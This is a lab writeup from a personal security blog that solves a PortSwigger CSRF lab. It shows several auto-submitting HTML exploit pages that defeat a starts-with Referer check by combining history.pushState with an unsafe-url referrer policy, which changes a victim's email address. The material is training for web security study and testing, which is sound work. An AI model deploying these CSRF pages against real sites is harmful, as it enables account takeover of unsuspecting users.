siunam's Website

My personal website

Home Writeups Research Blog Projects About

CSRF with broken Referer validation | Dec 15, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: CSRF with broken Referer validation! Without further ado, let's dive in.

Background

This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

Exploitation

Home page:

Login as user wiener:

In the previous labs, we found that the email change functionality is vulnerable to CSRF.

Let's inspect that HTML form:

<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
    <label>Email</label>
    <input required type="email" name="email" value="">
    <button class='button' type='submit'> Update email </button>
</form>

In here, we can see that there is no CSRF token.

Now, we can use the exploit serevr to test CSRF attack:

Then, we can craft a HTML form that performs CSRF attack on the victim:

<html>
    <head>
        <title>CSRF-12</title>
    </head>
    <body>
        <form action="https://0a9400bc039e5e9ac050dc50005c009b.web-security-academy.net/my-account/change-email" method="POST">
            <input type="hidden" name="email" value="attacker@evil.com">
        </form>

        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

To test is will work or not, I'll use the View exploit button:

However, it outputs an error: Invalid referer header.

In the previous lab, we bypass that check with a <meta> tag:

<html>
    <head>
        <meta name="referrer" content="no-referrer">
        <title>CSRF-12</title>
    </head>
    <body>
        <form action="https://0a9400bc039e5e9ac050dc50005c009b.web-security-academy.net/my-account/change-email" method="POST">
            <input type="hidden" name="email" value="attacker@evil.com">
        </form>

        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Let's try that again:

Hmm… We still get an Invalid referer header error.

This got me thinking: Is the application validates that the domain in the Referer starts with the expected value??

Let's check that in Burp Suite's Repeater:

In here, we can try to send a different URL in the Referer header:

Then, what if I try to append a GET parameter after the expected value?

It still works!

That being said, the application is checking the domain in the Referer starts with the expected value!

According the Mozilla web docs, we can use a JavaScript function called history.pushState():

To bypass that check, we can add the history.pushState() function in our exploit:

<html>
    <head>
        <title>CSRF-12</title>
    </head>
    <body>
        <form action="https://0a9400bc039e5e9ac050dc50005c009b.web-security-academy.net/my-account/change-email" method="POST">
            <input type="hidden" name="email" value="attacker@evil.com">
        </form>

        <script>
            history.pushState('', '', '/?0a9400bc039e5e9ac050dc50005c009b.web-security-academy.net')
            document.forms[0].submit();
        </script>
    </body>
</html>

This will cause the Referer header in the generated request to contain the URL of the target site in the query string.

However, this still couldn't work, as many browsers now strip the query string from the Referer header by default as a security measure.

To bypass that, we can just add a new <meta> tag to override that behavior and ensure that the full URL is included in the request:

<html>
    <head>
        <meta name="referrer" content="unsafe-url">
        <title>CSRF-12</title>
    </head>
    <body>
        <form action="https://0a9400bc039e5e9ac050dc50005c009b.web-security-academy.net/my-account/change-email" method="POST">
            <input type="hidden" name="email" value="attacker@evil.com">
        </form>

        <script>
            history.pushState('', '', '/?0a9400bc039e5e9ac050dc50005c009b.web-security-academy.net')
            document.forms[0].submit();
        </script>
    </body>
</html>

Finally, we can send this exploit to a victim:

We successfully changed a victim email address!

What we've learned:

  1. CSRF with broken Referer validation